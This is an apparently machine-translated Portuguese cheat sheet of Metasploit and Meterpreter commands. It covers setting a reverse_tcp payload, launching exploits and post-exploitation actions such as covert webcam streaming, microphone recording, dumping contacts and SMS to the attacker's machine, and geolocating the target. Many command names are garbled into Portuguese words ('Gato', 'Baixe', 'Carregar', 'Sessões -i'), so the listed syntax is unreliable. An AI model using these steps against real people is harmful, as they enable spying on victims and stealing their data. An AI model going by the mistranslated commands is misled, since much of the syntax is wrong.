Comandos úteis de Msfvenom e Metasploit O Projeto Metasploit é um projeto de segurança informática que fornece informações sobre vulnerabilidades de segurança e ajudas em testes de penetração e desenvolvimento de assinaturas IDS . Metasploit Framework , é uma ferramenta para desenvolver e executar o código de exploraçãocontra uma máquina de destino remoto.
O Projeto Metasploit é bem conhecido por suas ferramentas anti-forense e de evasão, algumas das quais incorporadas ao Metasploit Framework.
Bem-vindo hoje, colocamos uma lista de comandos úteis para o Metasploit para ajudá-lo a se familiarizar com os comandos mais utilizados no Metasploit Framework.
Alternativamente, consulte Lookfvenom e metasploit manuais de ajuda.
- Lista de Webcam ("Lista de webcams disponíveis na máquina de destino").
- set payload windows / meterpreter / reverse_tcp ("Define uma sessão reverse_tcp meterpreter".
- Msfvenom -h ("opções de ajuda da lista")
- Execute a webcam -p / var / www / ("Stream webcam para / var / www.")
- Execute webcam -s ("Stops webcam recording.")
- Mic -d 1 ("Gravar padrão do microfone: 1 segundo").
- Lpwd ("Local Print Working Directory") imprime o diretório de trabalho local.
- Ls (Este comando mostra o diretório de trabalho atual e a lista detalhada de arquivos no diretório de trabalho atual).
- Gato (mostra conteúdo de um arquivo)
- Cd (Change Directory)
- Editar (Descarrega uma cópia de uma pasta de arquivo para arquivos temporários e abre com o editor de texto padrão.)
- Baixe o arquivo ("Baixe um arquivo da máquina de exploração para a máquina do invasor").
- Baixe -r Documentos ("Baixe um Diretório da máquina explorada para o atacante".)
- Carregar arquivo ("Carregar um arquivo do invasor para a máquina de exploração".)
- Carregar -r Directory ("Carregar um diretório do invasor para explorar a máquina".)
- Getlwd (Mostrar o diretório de trabalho na máquina local.)
- Getwd ("Print working directory" na máquina explorada.)
- Info ("lista de informações sobre alvos, explorações, autor de módulo").
- Printwd ("Print working directory" na máquina explorada.)
- Lcd ("Local Change Directory" - altere o diretório local.)
- Lpwd ("Local Print Working Directory").
- Getlwd ("Obter Diretório de Trabalho Local".)
- Ls ("Lista de arquivos e diretórios em uma lista detalhada no diretório de trabalho atual").
- Mkdir ("Criar diretório") Cria um novo diretório na máquina de destino. ")
- Voltar ("recuperar informações sobre um exploit").
- Ajuda ("exibir possíveis comandos de exploração").
- verificar ("verifique se um alvo é vulnerável")
- Exploit ("iniciar uma tentativa de exploração").
- Pesquisa ("banco de dados do módulo de pesquisa")
- Ajuda de pesquisa ("procurar módulos usando palavras-chave").
- Mostrar ("mostrar os parâmetros disponíveis para uma exploração").
- Mostrar cargas úteis ("lista de carga útil disponível").
- Mostrar destinos ("retornar uma lista de sistemas operacionais vulneráveis à exploração selecionada").
- Record_mic ("Record Microphone MsfVenom")
- webcam_snap ("Tire uma foto instantânea da webcam").
- Webcam_stream ("Stream Webcam From Target Machine.")
- Dump_contacts ("Dump Targets Contact List to attackers machine.")
- Dump_sms ("Dump mensagens SMS para máquinas atacantes.")
- Geolocate ("Geolocate target device")
- Sessões -i ("lista de sessões avalíveis").
- Sessões -i 1 ("Conectar-se a uma sessão disponível".)
- Ping 192.168.1.1 ("Verifique se o host está vivo").
Se você conhece quaisquer comandos que deixamos da lista, sinta-se à vontade para deixá-los nos comentários e os adicionaremos.